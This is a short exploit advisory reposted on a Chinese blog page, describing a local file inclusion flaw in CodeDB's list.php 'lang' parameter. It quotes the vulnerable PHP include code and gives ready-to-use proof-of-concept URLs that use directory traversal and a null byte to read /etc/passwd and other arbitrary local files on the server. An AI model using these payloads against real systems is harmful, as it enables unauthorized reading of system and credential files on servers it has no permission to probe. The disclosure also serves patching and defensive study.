CodeDB (list.php lang) Local File Inclusion Vulnerability

时间：2015-11-30 21:47:09 阅读：1107 评论：0 收藏：0 [点我收藏+]

###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

// list.php

2. $lang = htmlspecialchars($_GET[‘lang‘]); // ok, but.... for what ? lol

7. if(file_exists(‘templates/‘.$lang.‘_middle.php‘)) // We‘ll have to cut off rest of filename & extension
8. include(‘templates/‘.$lang.‘_middle.php‘); // Ekhm... pwned ;d

Proof of Concept :

http://[host]/[codeDB_path]/list.php?lang=../readme.txt\0
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd\0
http://[host]/[codeDB_path]/list.php?lang=../[local_file]\0

EoF.

原文：http://www.jb51.net/hack/5690.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)